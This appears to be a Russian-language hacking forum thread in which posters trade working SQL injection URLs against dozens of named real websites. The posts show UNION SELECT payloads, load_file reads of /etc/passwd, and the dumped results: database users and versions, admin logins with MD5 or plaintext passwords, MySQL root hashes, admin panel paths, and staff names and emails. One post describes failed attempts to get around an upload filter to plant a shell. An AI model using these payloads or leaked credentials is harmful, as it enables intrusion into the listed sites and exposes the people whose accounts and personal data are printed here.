https://www.myparklane.com/repcart/repcart.php?rep_id=-1+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- Читаемс файлы
http://www.localpet.com.mx/en/detalle_lost.php?indice=-1+union+select+1,2,3,4,5,concat_ws(0x3a3a,usuarios_user,usuarios_pass),7,8,9,10+from+usuarios+limit+0,1/* Злобный похек ))
Ну что? Поувedим? http://monasticmatrix.usc.edu/cartularium/article.php?textId=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(version(),0x3a,user(),0x3a3a3a,user,0x3b,password),16,17,load_file(0x2f6574632f706173737764),19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+mysql.user-- Code: 4.1.22-standard:root@localhost:::root;2c0172cd64f6a4e5
Code: http://www.villanoailles-hyeres.com/hyeres22en.php?cat_id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15/* [email protected]:5.0.45-log:villanoailles-hyerescom
фигня как фигня..не скуль.. https://www.bcbookshop.co.uk/nla/book.php?id=-1+union+select+1,2,3,4,5,load_file(%27/etc/passwd%27),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33-- шелл не залить..т.к. стоит на виртуал хосте..((
Ну как я могу не поддержать тему. Ловите. school.su Code: http://www.school.su/text.phtml?m=-999+union+select+concat_ws(0x3a,version(),user(),database())/* ппц на школы потянуло... ____________________________ drc.academic-staff.wisc.edu Code: http://drc.academic-staff.wisc.edu/faq/faq_answers.php?question_id=0+union+select+concat(user,0x3a,password),2,3+from+mysql.user/* ____________________________ gps-profi.ru pr-5 Тиц-190 ух что я нашел хочу админить форумом Code: http://www.gps-profi.ru/garmin_carry.php?id=-28+union+select+1,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+phpbb_users+limit+1,1-- admin:0295af933b3aaed46b76727b6d79f4b2-93457456 Code: http://gps-profi.ru/forum/admin хочу админить сайтом Code: http://www.gps-profi.ru/garmin_carry.php?id=-28+union+select+1,concat(password,0x3a,login),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+admin-- admin:93457456 Code: http://www.gps-profi.ru/admin/ авторизация, вроде как не из бд... Но пароль подходит(админ ставит одни и теже пароли) [email protected]:5.0.67-log _____________________ nigatrade.biz Code: http://nigatrade.biz/realty/zakaz.php?id=-1+union+select+1,2,3,4,concat(name,0x3a,pwd),6,7,8,9,10,11,12+FROM+admins+limit+1,1-- root:74b32d175f2101ba6e831478f32b85d8-[COLOR=Red]johnniko[/COLOR] Code: http://nigatrade.biz/admin/ _____________________ seo.kharkov.ua Code: http://seo.kharkov.ua/artikle.php?id=-1+union+select+1,2,concat(nick,0x3a,passwd),4,5,6,7+FROM+users-- admin:837a1b504eff2161d14187f1fd52d3b7 _____________________ kiirus.ee pr-3 Code: http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,concat(name_admin,0x3a,pass_admin),3,4,5,6+from+admin-- Need4speed08:d2357411549940e64b552c99e78a1035-393_AZE Code: http://www.kiirus.ee/php/admin/ Как-то так = ) давайте ...держим тему
h__p://www.pdaplaza.com/shop.php?catid=18&id=-737+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- pdaplaza_pda@localhost 4.1.22-standard Table [admins] admin_email admin_id admin_pwd admin_name admin_uid Возможно есть другие колонки Phillip:5e6cbfce52f55b0b3065b6806a7d5d41:[email protected] supervisor:d943b780e979b19baa64c243d26669b1:[email protected] Kovacs Robert:19640501:[email protected] 5e6cbfce52f55b0b3065b6806a7d5d41artisan08 админка хз где
http://www.pinnacleproactive.co.uk/resources/events/book.php?Id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+admin-- http://www.pinnacleproactive.co.uk/edit/ PR: 3 ---------------- http://www.ciritas.ru/product.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),version(),user(),database()),4,5,6,7,8,9-- 4.1.22-log - ciritas5_website@localhost - ciritas5_ciritas ------------------------ http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(group_concat(login,0x3a,password,0x3a,total_score))),11,12+from+user-- -----------------
Поздравьте меня - моя первая самостоятельная скуля)) Французики. http://www.isep.fr/histelcon/public/page.php?nump=-16+union+select+concat_ws(0x3a,database(),user(),version())/* histel histel@localhost 5.0.32-Debian_7etch6-log http://www.isep.fr/histelcon/public/page.php?nump=-16+union+select+concat_ws(0x3a,login,pass)+from+histel.users+limit+0,1/* admin:2008histel логин и пасс от админки http://www.isep.fr/histelcon/admin/ они же подходят и к phpmyadmin - http://www.isep.fr/phpmyadmin Увы, на этом всё обрывается, файловых привилегий нет, а админка весьма скудная в средствах. Есть только простенькая форма аплоада http://www.isep.fr/histelcon//admin/envoyer_fichier.php, но как я не бился, заставить принимать файлы с расширениями, отличными от pdf, doc и ppt , не удалось.. нулевой байт не проходит и прочие фишки... Причем при аплоаде проверка идет только по расширению, не по типу файлов...
Вот от меня PR 4 сайт: www.sbbs.ru уязвисомть: Code: http://www.sbbs.ru/news/index.php?id=999999999999999999+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13/* Code: user(ivolgaru_news@localhost) version(4.1.22-lk-log) database(ivolgaru_news) PR 4 сайт: http://globus.mp21.ru уязвисомть: Code: http://globus.mp21.ru/topics.php?ID=99999999999999+union+select+1,version(),3,4,5,6,7,8,9/* Code: user(mp21ru_globus@localhost) version(4.1.22-standard) database(mp21ru_globus) RP 0 сайт: http://www.interp.ru/ уязвисомть: Code: http://www.interp.ru/index.php?id=-3+union+select+1,2,3,4,5,6,7,version(),9,10/* Code: user(interp@localhost) version(4.1.22-log) database(wwwinterpru) RP 4 сайт: http://ecom-info.spb.ru/ уязвисомть: Code: http://ecom-info.spb.ru/monitoring/print.php?id=-208+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26-- Code: user([email protected]) version(5.0.24a) database(u9116_2) RP 5 сайт: http://www.omskdrama.ru уязвисомть: Code: http://www.omskdrama.ru/wwwroot/index.php?gid=-104+union+select+1,2,version(),4,5,6,7/* Code: user(drama@localhost) version(4.1.22) database(drama) PS Вся жизнь театр ,а люди в нем актеры ) RP 4 сайт: http://www.allaces.ru/ уязвисомть: Code: http://www.allaces.ru/p/episode.php?id=-444+union+select+1,2,3,4,version()-- Code: user(ecom@localhost) version(5.0.67-log) database(ecom) RP 4 сайт: http://www.genoterra.ru/ уязвисомть: Code: http://www.genoterra.ru/news/comment.php?id=-938+union+select+1,2,3,4,5,6,7,8,version(),10,11,12/* Code: user(genoterra@localhost) version(4.1.21-standard-log) database(genoterra)
Фанатам Диабло старкрафта варкрафта..... http://strategy.diabloii.net/searchcat.php?cid=36+union+select+1,version(),3,user(),database(),6,7/* Database Version: 5.0.42-log Database name: stratd2 User name: d2strategy@localhost С мускула логины и пароли root *CD3F739E436C54FDC8B2D2F844C223817ACC2118 starcraftwire *1EA1E1C7B33A1318B8FFDF44C89E34E2B43418DA d2strategy *DC960B6A83F5D1D7738DB7B4C80DABA9F5702647 blizzpages *1FA34052F3B051E4323ADFD5EDA04CF183F3A79E aocforums *7574F9535B810D513B4C9C2F8C33EF0B6BEDC98B aocgallery *1A336A2F564A40CF1348ACB80627E95259B3B549 aocring *60F70737C92FA05993090552F9750EA92E5805DB starcraftwiki *91D00EE01412A5447CAD8BD8443949557FB00E30 starcraft-2763 *23CB9564F4A8C2818F6C6EFFBD5018B170236F8D В общем там несколько замечательных хоста....) А теперь закончим начатое. Довольно крупное диз агенство пароли так и не подобрал http://www.marotori.com/news.php?id=2+union+select+1,2,3,concat_ws(0x3a3a,user_id,user_name,user_password,user_email),5,6+from+users-- MD5(UNIX) root::$1$K6ORGtcZ$wQuds2xEEzYFc7BnHHgel0 admin::$1$6DUI484h$0cQV5wcSIVoXH5q5k8mTe. Ну и попроще : http://www.replocate.com/category.php?id=-8+union+select+concat_ws(0x3a3a,version(),user(),database())/* version: Industry: 5.0.45-log user: [email protected] database: replocate http://www.nsgroupllc.com/news.php?id=-11+union+select+1,2,concat_ws(0x3a3a,version(),user(),database())/* version: 5.0.32-Debian_7etch8-log user: nsg_read_only@localhost database: nsg http://www.lo-cal.com/eventinfo.php?event_ID=266+union+select+version(),user(),3,4,5,6,7,8,9,10,database(),12,13+limit+1,1/* version: 4.1.22-standard user: localftp_localmu@localhost database: localftp_localmusic http://mutualideas.com/projects.php?id=-47+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9-- version:5.0.32-Debian_7etch1-log user:mysql2908@localhost database:db2908_mutual04 http://www.parsiteb.com/combinational.php?table=combinational&id=-19+union+select+1,version(),3,4,user(),database(),7,8,9,10,11,12,13--&action=viewFullContent version: 5.0.45-community user: parsiteb_parsite@localhost database: parsiteb_parsitebdatabase
http://www.havanaclub.cz/boutique/?act=8&pid=-1+union+select+1,2,concat_ws(0x3a3a,login,passwd),4,5,6,7,8,9,10+from+admin_users+limit+0,1/* login: david pass:david ЛОЛ
Все срочно идём в магазин за Катанами и всякой такой китайской штукой -) или японской не силён в этом -) http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database())/* Database Version: 5.0.45 Database name: kitanaru User name: kitanaru@localhost Таблица personal id:loginsw:type:fio:email 2:ANDR:dbe679f999e91a255b5b4ecb9303f888:1:Горячев:[email protected] password:CJRJKJDF 3:777:c7411e168031e804e9f35fbc362ef87c:2:Евгений Васильевич[email protected] password:: 1G0 5:OLEG:3767d0c6335a92c2364dca739c3b0c23:1:Цыбульский Олег[email protected] password: XTHYJD
Ну и на сегодня последнее поразвлекаться в игрушки ...... http://www.novelgames.com/flashgames/category.php?id=11+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8-- version: 4.1.10-log user : novelgames@localhost database:novelgames Далее достаём всё сами я чисто админчеГа поднял и норма *) Пароли в открытом виде.Сделали нам одолжения *) http://www.novelgames.com/flashgames/category.php?id=11+union+select+1,2,3,4,concat_ws(0x3a3a,id,name,password,email),6,7,8+from+players+limit+9,1-- 1 :: Peter Lee :: boul3lam :: [email protected] Всё спокойной ночи вам!
http://faceup.ie/article/index.php?ID=-1+union+select+1,2,3,4,5,concat_ws(0x3a,ID,username,password,level),7,8,9,10,11,12+from+tbl_adminarea-- http://faceup.ie/admin 403 error нет доступа(